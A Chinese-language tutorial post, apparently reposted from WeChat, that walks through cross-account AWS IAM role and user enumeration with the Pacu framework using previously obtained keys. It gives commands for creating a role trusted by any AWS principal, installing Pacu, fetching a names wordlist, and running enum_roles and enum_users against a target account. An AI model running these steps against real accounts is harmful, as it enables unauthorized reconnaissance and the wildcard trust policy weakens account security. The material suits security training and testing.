AWS云安全系列 2- IAM跨账户枚举
2022-4-18 08:57:39 Author: mp.weixin.qq.com(查看原文) 阅读量:5 收藏

国内云安全培训请点击原文或访问以下链接

https://www.yuque.com/u8047536/supvqp/ri4ft0

前提是已经获取了相关的密钥

步骤 1:将 AWS CLI配置为访问凭证

命令:

aws configure

步骤 2:创建包含以下内容的 JSON 角色策略文件,并将其命名为 

assume-role-doc.json

{"Version": "2012-10-17","Statement": [{"Effect": "Allow", "Principal": {"AWS": "*"},"Action": "sts:AssumeRole", "Condition": {}}]}

步骤 3:使用伪造的策略,使用AWS CLI 在 AWS   账户上创建角色

命令:

aws iam create-role --role-name a4 --assume-role-policy-document file://assume-role-doc.json

步骤 5:安装 PACU

 命令:

git clone https://github.com/RhinoSecurityLabs/pacu cd pacubash install.sh

 注意:如果遇到有关 boto3 和 botocore 不兼容的任何错误,请使用此'pip3 install boto3' 单独安装 boto3。

步骤 5:启动 PACU

命令:

python3 pacu.py

步骤 6: 输入任何会话名称

步骤 7:在pacu中设置 AWS 访问凭证。使用任何别名并输入已经拥有的密钥

命令:

set_keys

步骤 8:列出 pacu 模块

命令:

list

步骤 9:下载name.txt,并且添加 “ad-” 前缀

命令

curl https://raw.githubusercontent.com/jeswinMathai/wordlist/main/names.txt -o names.txt sed -i 's/^/ad-/g' names.txtcat names.txt

注意:根据需要将路径更改为“name.txt”

步骤 10:运行pacu模块来枚举角色

命令

run iam enum_roles --role-name a4 --account-id 2XXXXXXXXX2 --word-list /home/Lxxx/names.txt

已成功检索目标 AWS账户 上的角色。

步骤 11: 运行pacu模块来枚举用户

命令

run iam enum_users --role-name a4 --account-id 2XXXXXXXX2 --word-list/home/Lxxxx/names.txt

已成功检索目标 AWS 账户上的用户

  1. 1.    AWSCLI(https://docs.aws.amazon.com/cli/latest/reference/)

  2. 2.     PACU(https://github.com/RhinoSecurityLabs/pacu)


文章来源: http://mp.weixin.qq.com/s?__biz=MzA4MDMwMjQ3Mg==&mid=2651867999&idx=1&sn=772fd04cfca49f2ccc13c88347171fd3&chksm=8442b3b8b3353aae4dbe9482e0537960baf764aed14f92ca57fa8b0d2ed7657688b813b5576f#rd
如有侵权请联系:admin#unsafe.sh